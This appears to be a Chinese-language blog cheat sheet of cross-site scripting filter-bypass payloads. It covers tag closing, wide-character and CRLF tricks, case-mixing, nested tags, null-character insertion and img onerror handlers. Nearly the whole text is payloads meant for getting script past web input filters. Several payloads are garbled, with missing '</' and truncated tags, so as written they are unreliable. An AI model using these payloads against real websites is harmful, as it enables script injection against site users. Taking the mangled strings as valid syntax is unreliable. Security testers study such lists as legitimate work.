![db94755d33ac05b9a9860470fa955067.png](https://img-blog.csdnimg.cn/img_convert/db94755d33ac05b9a9860470fa955067.png)
尝试构造xss,突破各种限制
闭合标签
通过各种方式,闭合前面的语句
常规闭合"><script>alert(1);script>
闭合大部分标签
*/-->'");>iframe>script>style>title>textarea><a>aa>#*/-->'");>iframe>script>style>title>textarea><iframe >
宽字符闭合
*/-->%cf"%d5'>frame>script>style>title>textarea>
回车换行
很多时候,回车换行能绕过很多的限制
%0D%0A
标签绕过
fuzz各种标签,检查是否存在拦截或者过滤
大小写绕过
<ScRipt>ALeRt("XSS");sCRipT>
嵌套绕过
ript>alert(/xss/);script>alert(/xss/);script>
空字符绕过
09ipt>ALeRt(/XSS/);sCRipT>
标签
<img src="" onerror="alert(/xss/)"><img/src/onerror=alert(/xss/)><img/src='123'onerror=[/xss/].find(alert)>